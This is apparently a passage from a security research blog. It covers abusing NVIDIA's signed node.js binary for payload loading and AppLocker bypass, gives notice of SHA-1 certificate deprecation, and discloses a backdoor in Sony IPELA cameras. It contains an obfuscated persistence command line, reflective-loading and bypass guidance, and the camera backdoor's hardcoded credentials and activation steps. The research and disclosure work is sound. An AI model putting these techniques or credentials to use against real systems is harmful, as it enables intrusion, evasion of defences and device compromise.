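// expected addon entry points are missing -- but by the time the
// error is raised, the DLL's DllMain has already executed.
function loadNative(path) {
  try {
    return require(path);   // a real .node addon loads normally
  } catch (e) {
    return e;               // .dll case: error thrown, DllMain already ran
  }
}

loadNative('C:\\Users\\Public\\loader.node');  // illustrative path
loadNative('C:\\Users\\Public\\payload.dll');  // illustrative path
```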


A drawback of the reflective DLL injection attack is that it requires one file write: as far as I know, node.js does not support executing modules from memory (or directly accessing the Windows API). It's therefore necessary to drop one loader module to disk and then load this module, which acts as a wrapper for the Windows API. Using the dropped module, the script can access the Windows API and reflectively load any executable / library into the signed node.js process (a concept similar to Invoke-ReflectivePEInjection.ps1 from PowerSploit, see [6]).

Please note that the above approach drops one file to disk; however, this is only a legitimate node.js module. The real malware can afterwards be loaded via the loader module from memory and is therefore never written to disk.

The file can be dropped to the following location which is writeable by standard users:

%systemdrive%\ProgramData\NVIDIA Corporation\Downloader\
Overcoming the “issue” of the one file write is not trivial. It's not really a big problem (e.g. the dropped file is not malicious and will not be detected by an antivirus solution); however, it could block execution in some cases (e.g. DLL AppLocker rules). Such DLL rules can be bypassed in several ways, depending on the product and configuration used. For example, it's possible to abuse the AppLocker default rules, which allow execution of all files in %windir%\*. Therefore, an attacker can drop his node module into the writeable tasks folder:

There are many similar writeable locations inside the %windir% folder. Let's assume that an administrator denies all these writeable locations by adding exclude rules for them. Is the system now secure?

The answer is NO, because ADS (Alternate Data Streams) can be abused. Since we can create a sub-folder in %windir%\tracing, we can create an ADS on that folder (for an explanation of ADS, see Alex Inführ's blog post [7]). This can be used to bypass additional restrictions / monitoring rules. Let's say we drop the following file:

All common APIs return %windir% as the base folder, not %windir%\tracing, which makes the module look like a file from the normal Windows folder (however, a normal user does not have write permissions to %windir%!).

This trick is already known and was described by James Forshaw in a different context (unfortunately, I couldn't find his original post on it, but in general all his posts are highly recommended).

What does that mean? Even if an administrator has added exclude rules on top of the default rules to block writeable folders, we can still bypass AppLocker with an ADS.

The following figure shows this (AppLocker is configured to prevent C:\Windows\tracing\* and several other writeable locations): 

Here, Microsoft's control.exe is used to load the library; however, it can also be loaded via node.js (and using the fs module it's possible to create the ADS).

Another possibility is to overwrite an existing library, if application whitelisting was configured based only on paths (which is often the case because of updates).

Here are some additional methods I tried in order to avoid the file write altogether.

UNC paths:

The code first tries to load the addon via SMB (port 445) and uses WebDAV (port 80) as a fallback. Since outgoing SMB traffic is forbidden in most environments, it would be good to directly access the data via WebDAV (it's possible to create a WebDAV server in JavaScript with node.js, but then firewall problems can occur). This is possible via paths such as the following two:


A good explanation why these paths work can be found at [8].

However, both path formats are not allowed inside node.js (the code later calls lstat, which throws a file-not-found exception). Moreover, Microsoft internally writes the file to %localappdata%, making the approach useless for achieving file-less exploitation.

Another idea was to abuse named pipes, which can be created from node.js code; however, named pipes are not seekable, and therefore LoadLibrary() / require() fail.

Calling CreateFile with FILE_ATTRIBUTE_TEMPORARY and FILE_FLAG_DELETE_ON_CLOSE creates, in most cases, an in-memory file; however, node.js does not provide a way to pass these flags from JavaScript code.

For people wondering why NVIDIA ships with node.js

At startup, NVIDIA starts a web server via node.js on a randomized port (providing functionality like the webcam control mentioned above). To protect against attacks, a random secret cookie is created which must be passed in order to interact with the service. The port number and cookie value in use can be extracted from the following file:

%localappdata%\NVIDIA Corporation\NvNode\nodejs.json 


For red teamers, the recommended approach is to use the fs module from node.js to write a loader addon to disk, which gives access to the Microsoft Windows API from JavaScript code. JavaScript code can then download the (encrypted) payload from the internet and, using the Windows API, reflectively load the payload into its own process space and execute it.

Node.js itself can be started via one of the publicly known techniques (see our slides at [1]), for example .chm, .lnk, .js, .jse, Java applets, macros, from an exploited process, pass-the-hash, and so on.

Standard obfuscation tricks can be used to further hide the invocation. For example, the following code starts calc.exe but tries to disguise itself:

echo "outdated settings;set colors=";c=['\162\145\161\165\151\162\145','\143\150\151\154\144\137\160\162\157\143\145\163\163','\145\170\145\143','\143\141\154\143'];global[c[0]](c[1])[c[2]](c[3]);"; set specialChars='/*&^"|;"%ProgramFiles(x86)%\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" -i

Such code can be used as a persistence mechanism (auto start) because the called binary is signed by NVIDIA and will be considered safe. Of course, additional anti-monitoring tricks such as ^ or %programdata:~0,-20% can be used somewhere inside the above command line to further prevent detection; however, such code is, in my opinion, a telltale sign in itself.

For security consultants, it's recommended to search for node.js binaries (file size > 10 MB and the binary contains Node.js strings) during client security audits, to identify other vendors that ship node.js to clients.

For blue teamers, it's recommended to remove the file from the whitelist (if possible) or at least monitor its invocation.

This research was done by René Freingruber (@ReneFreingruber) on behalf of SEC Consult Vulnerability Lab. SEC Consult is always searching for talented security professionals to work in our team. More information can be found at:







Wednesday, January 18, 2017

Last call to replace SHA-1 certificates

(c) iStock 629455088

All major browsers will stop accepting SHA-1 certificates in January/February. An average user will then not be able to distinguish between an invalid certificate (e.g. a certificate from an attacker) and a valid certificate that is using a SHA-1 hash. Effectively, this means that Internet services that still use SHA-1 certificates will become unusable for a large portion of users within the next few weeks.

Specifically, the following dates apply for the major browsers:

Browser vendors have provided ways to keep using SHA-1 certificates issued by an internal CA (often used for internal services like webmail). However, this is a temporary measure; Google Chrome, for example, will remove support for SHA-1 entirely by 2019 at the latest.

The following Censys query demonstrates that there are still many TLS services worldwide that are affected by this. The query includes all HTTPS services with certificates that are a) not expired, b) would otherwise be trusted by browsers, and c) are signed using the SHA-1 hash algorithm:


Is this necessary?

By disabling trust for SHA-1 certificates, browser vendors try to prevent a situation similar to what happened in 2008. Well before 2008, it was commonly known that the MD5 hash algorithm exhibits serious weaknesses. Despite that, many certificate authorities issued MD5 certificates and major browsers accepted them. The attacks against MD5 improved continuously over the years until, in 2008, a group of researchers used the weaknesses in MD5 to successfully forge a rogue CA certificate. Using this certificate, the researchers were able to issue arbitrary certificates for any service on the Internet. We now know that any criminal organisation that had conducted the same research and implemented a similar attack could have successfully intercepted arbitrary TLS connections (e.g. HTTPS) on the Internet.

There are many parallels between the situation then and the situation we now have with SHA-1. The first weaknesses in SHA-1 were published in 2005, and the attacks have continuously improved since then. In 2015, researchers estimated that finding a collision in SHA-1 would cost between $75,000 and $120,000. While a collision does not necessarily allow for a practical attack, being able to find one severely undermines the security of SHA-1. It is very hard to estimate how long it will take to advance the current attacks to the point of successfully forging a certificate. Moreover, it is possible that organisations outside of academia already have knowledge of even more advanced attacks against SHA-1.

Therefore, it is necessary for browser vendors to disallow the use of SHA-1 certificates now, before we are in a situation similar to the situation in 2008. Google even goes so far as to warn against "the imminent possibility of attacks that could directly impact the integrity of the Web PKI".

The abandonment of the SHA-1 hash algorithm also affects code signing certificates. Although Windows code signing certificates with SHA-1 signatures can still be obtained, Certificate Authorities would probably be forced to revoke all SHA-1 certificates once a practical attack is known. This especially affects versions of Microsoft Windows that do not support any other hash algorithm for code signing (i.e. legacy Windows versions such as XP SP3, Windows Server 2008 and Windows Vista).


As a countermeasure, we recommend replacing affected certificates immediately!

If the certificates are not replaced by 2017-02-14 (the date for IE11 / Edge; even earlier for other browsers), a large portion of users will not be able to access the affected services.

To test whether your Internet services are affected by this and other issues in your TLS configuration, SSL Labs provides a very useful tool that can be found here.

Tuesday, December 6, 2016

Backdoor in Sony IPELA Engine IP Cameras

SEC Consult has found a backdoor in Sony IPELA Engine IP cameras, mainly used professionally by enterprises and authorities. This backdoor allows an attacker to run arbitrary code on the affected IP cameras. An attacker can use the cameras to gain a foothold in a network and launch further attacks, disrupt camera functionality, send manipulated images/video, add cameras to a Mirai-like botnet or simply spy on you. This vulnerability affects 80 different Sony camera models. Sony was informed by SEC Consult about the vulnerability and has since released updated firmware for the affected models.

Further information about the backdoor, disclosure timeline, affected devices and updated firmware can be found in our advisory. This blog post has some highlights from the vulnerability analysis.

This advisory is the result of research that started by uploading a recent firmware update file from a Sony camera into our cloud based firmware analysis system IoT Inspector.

After a few minutes the analysis results were available. One result immediately caught our attention:

Excerpt from IoT Inspector results

So here we have two password hashes. One is for the user admin and was cracked immediately: the password is admin. This is no surprise, as the default login credentials are admin:admin.

The second password hash is much more interesting: it's for the user root, and it was found in two different files: /etc/init.d/SXX_directory and /usr/local/lib/

We can use the file system browser of IoT Inspector to have a look at the SXX_directory.

Excerpt from IoT Inspector filesystem browser

It looks like this startup script (called by /sbin/init/rcS during boot) is responsible for creating and populating the file /tmp/etc/passwd (/etc/passwd is a symlink to this file). A line for the root user, including a password hash, is added; the shell is /bin/sh. Not good!

So, what can we do if we can crack the hash? At this point we can assume that it's very likely we can login using UART pins on the PCB. This of course requires us to have physical access and to disassemble the device.

The other places where we could possibly use the password are Telnet and SSH, but neither service is available on the device … or are they? A quick string search in the firmware's filesystem for “telnet” shows that a CGI binary called prima-factory.cgi contains this string a few times. IDA Pro to the rescue! It seems this CGI has the power to do something with Telnet:

The code in g5::cgifactory::factorySetTelnet() (in decompiled form below) is pretty straightforward. Based on the input, the inetd daemon is killed or started:

The inetd daemon gets its configuration from /etc/inetd.conf, and inetd.conf is set up to launch Telnet.
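A typical inetd.conf entry for Telnet looks like this (illustrative; the exact line on the device may differ):

```
telnet  stream  tcp  nowait  root  /usr/sbin/telnetd  telnetd
```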

So how can we reach this CGI functionality? The answer lies in the lighttpd binary. Lighttpd is an open source web server that was modified by Sony. Some custom code for HTTP request handling and authentication was added. Below is an excerpt from a data structure that maps the URI /command/prima-factory.cgi to the CGI in the file system. The authentication function is HandleFactory.

HandleFactory decodes the HTTP Basic Authentication header and compares it to the username/password primana:primana.
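For reference, the Basic Authentication header the CGI expects is just the base64 encoding of "user:password"; a quick sketch:

```javascript
// Builds the HTTP Basic Authentication header value for user:password.
function basicAuth(user, pass) {
  return 'Basic ' + Buffer.from(user + ':' + pass).toString('base64');
}

// The header HandleFactory expects:
//   Authorization: Basic cHJpbWFuYTpwcmltYW5h
console.log(basicAuth('primana', 'primana'));
```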

Now we have all ingredients to craft an attack that looks like this:

  1. Send HTTP requests to /command/prima-factory.cgi containing the “secret” request values cPoq2fi4cFk and zKw2hEr9 and use primana:primana for HTTP authentication. This starts the Telnet service on the device.
  2. Login via Telnet using the cracked root credentials. Note: We have not cracked the root password ourselves, but it's only a matter of time until someone does.

The user primana has access to other functionality intended for device testing or factory calibration(?). There is another user named debug with the password popeyeConnection that has access to other CGI functionality we didn't analyze further.

We believe that this backdoor was introduced by Sony developers on purpose (maybe as a way to debug the device during development or factory functional testing) and not an "unauthorized third party" like in other cases (e.g. the Juniper ScreenOS Backdoor, CVE-2015-7755).

We have asked Sony some questions regarding the nature of the backdoor, intended purpose, when it was introduced and how it was fixed, but they did not answer.

For further information regarding affected devices and patched firmware, see our advisory. IoT Inspector now comes with a plugin that detects this vulnerability.